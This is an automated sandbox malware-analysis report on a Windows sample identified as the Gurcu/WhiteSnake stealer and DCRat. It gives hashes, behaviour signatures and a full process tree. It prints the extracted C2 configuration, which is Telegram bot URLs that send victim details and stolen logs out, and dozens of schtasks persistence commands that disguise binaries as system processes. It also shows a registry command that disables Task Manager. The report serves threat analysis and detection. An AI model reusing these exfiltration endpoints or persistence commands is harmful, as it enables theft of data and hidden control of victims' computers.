Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    15-11-2024 23:13

General

  • Target

    1.exe

  • Size

    2.5MB

  • MD5

    a13b59f33063b970d7adbe2a23fb5a81

  • SHA1

    7a8f1204af663a38f87816c528e27137f310ae42

  • SHA256

    9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946

  • SHA512

    6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f

  • SSDEEP

    49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ZTSLLRFH%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Cbrowserperf%5Csysmon.ex

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A38.392558

https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A11.283864

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Gurcu family
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 17 IoCs
  • Process spawned unexpected child process 51 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 9 IoCs
  • DCRat payload 9 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 32 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 10 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 51 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 9 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3556
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\browserperf\DnCoBuHIAvg.vbe"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\browserperf\RcA8rkUQUHdsADqQUNtkjn.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3628
        • C:\browserperf\BlockDriversession.exe
          "C:\browserperf\BlockDriversession.exe"
          4⤵
          • Modifies WinLogon for persistence
          • UAC bypass
          • Drops file in Drivers directory
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:1508
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DgHlPzdV8W.bat"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4828
            • C:\Windows\system32\w32tm.exe
              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              6⤵
                PID:3772
              • C:\browserperf\sysmon.exe
                "C:\browserperf\sysmon.exe"
                6⤵
                • UAC bypass
                • Checks computer location settings
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Modifies registry class
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                • System policy modification
                PID:416
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\02a6598c-5b1d-4613-975d-28dd77e56082.vbs"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4584
                  • C:\browserperf\sysmon.exe
                    C:\browserperf\sysmon.exe
                    8⤵
                    • UAC bypass
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Modifies registry class
                    • Suspicious behavior: GetForegroundWindowSpam
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    • System policy modification
                    PID:1224
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2f4171b3-058b-4288-8dc4-85946c3d3649.vbs"
                      9⤵
                        PID:284
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cbf30c07-3da3-4ecc-8cbd-a9b05ca87505.vbs"
                        9⤵
                          PID:4224
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1643e7d5-e16c-4687-846d-a0757bf86570.vbs"
                      7⤵
                        PID:3000
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zfOrxS71E3.bat"
                        7⤵
                        • Suspicious use of WriteProcessMemory
                        PID:692
                        • C:\Windows\system32\w32tm.exe
                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          8⤵
                            PID:3592
                          • C:\browserperf\sysmon.exe
                            "C:\browserperf\sysmon.exe"
                            8⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1992
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\r0MODpJtud.bat"
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2960
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            8⤵
                              PID:3544
                            • C:\browserperf\sysmon.exe
                              "C:\browserperf\sysmon.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1428
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QsS2ZSeOHk.bat"
                            7⤵
                            • Suspicious use of WriteProcessMemory
                            PID:844
                            • C:\Windows\system32\w32tm.exe
                              w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              8⤵
                                PID:3512
                              • C:\browserperf\sysmon.exe
                                "C:\browserperf\sysmon.exe"
                                8⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1408
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eoRA4B8PWR.bat"
                              7⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3460
                              • C:\Windows\system32\w32tm.exe
                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                8⤵
                                  PID:3380
                                • C:\browserperf\sysmon.exe
                                  "C:\browserperf\sysmon.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2276
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\zlYgv4zteq.bat"
                                7⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5072
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  8⤵
                                    PID:4520
                                  • C:\browserperf\sysmon.exe
                                    "C:\browserperf\sysmon.exe"
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:632
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\rBMLF9HJtT.bat"
                                  7⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4468
                                  • C:\Windows\system32\w32tm.exe
                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    8⤵
                                      PID:5040
                                    • C:\browserperf\sysmon.exe
                                      "C:\browserperf\sysmon.exe"
                                      8⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4052
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\YeeJHhLP1x.bat"
                                    7⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3892
                                    • C:\Windows\system32\w32tm.exe
                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                      8⤵
                                        PID:1068
                                      • C:\browserperf\sysmon.exe
                                        "C:\browserperf\sysmon.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4788
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5wLWjZnu9K.bat"
                                      7⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:388
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        8⤵
                                          PID:2816
                                        • C:\browserperf\sysmon.exe
                                          "C:\browserperf\sysmon.exe"
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4296
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Modifies registry key
                                  PID:1660
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2932
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2396
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Windows\SystemResources\Windows.UI.BlockedShutdown\pris\WmiPrvSE.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1852
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2220
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4060
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\browserperf\cmd.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4584
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2936
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2364
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\WindowsPowerShell\WaaSMedicAgent.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4796
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1472
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2876
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Documents\SearchApp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4500
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4448
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2244
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2552
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 14 /tr "'C:\browserperf\sysmon.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4112
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3728
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 10 /tr "'C:\browserperf\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4004
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2804
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2404
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\3D Objects\sppsvc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3636
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\browserperf\upfc.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1068
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4932
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\browserperf\upfc.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1292
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\lsass.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3804
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4536
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2568
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\browserperf\dllhost.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4788
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3424
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\browserperf\dllhost.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1492
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 9 /tr "'C:\browserperf\unsecapp.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1992
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3976
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 13 /tr "'C:\browserperf\unsecapp.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:5012
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\browserperf\csrss.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1392
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3752
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\browserperf\csrss.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1736
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2904
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4196
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3236
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1044
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversession" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2060
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "BlockDriversessionB" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\BlockDriversession.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3404
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:976
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1428
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\en-US\sysmon.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:1612
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\en-US\dwm.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:216
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4052
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\Help\en-US\dwm.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:2716
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Videos\Idle.exe'" /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:3488
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:4828
                          • C:\Windows\system32\schtasks.exe
                            schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Videos\Idle.exe'" /rl HIGHEST /f
                            1⤵
                            • Process spawned unexpected child process
                            • Scheduled Task/Job: Scheduled Task
                            PID:64
                          • C:\Windows\system32\vssvc.exe
                            C:\Windows\system32\vssvc.exe
                            1⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3780
                          • C:\Windows\system32\wbem\WmiApSrv.exe
                            C:\Windows\system32\wbem\WmiApSrv.exe
                            1⤵
                              PID:692
                            • C:\Windows\system32\wbem\WmiApSrv.exe
                              C:\Windows\system32\wbem\WmiApSrv.exe
                              1⤵
                                PID:2592

                              Network

                              MITRE ATT&CK Enterprise v15

                              Downloads
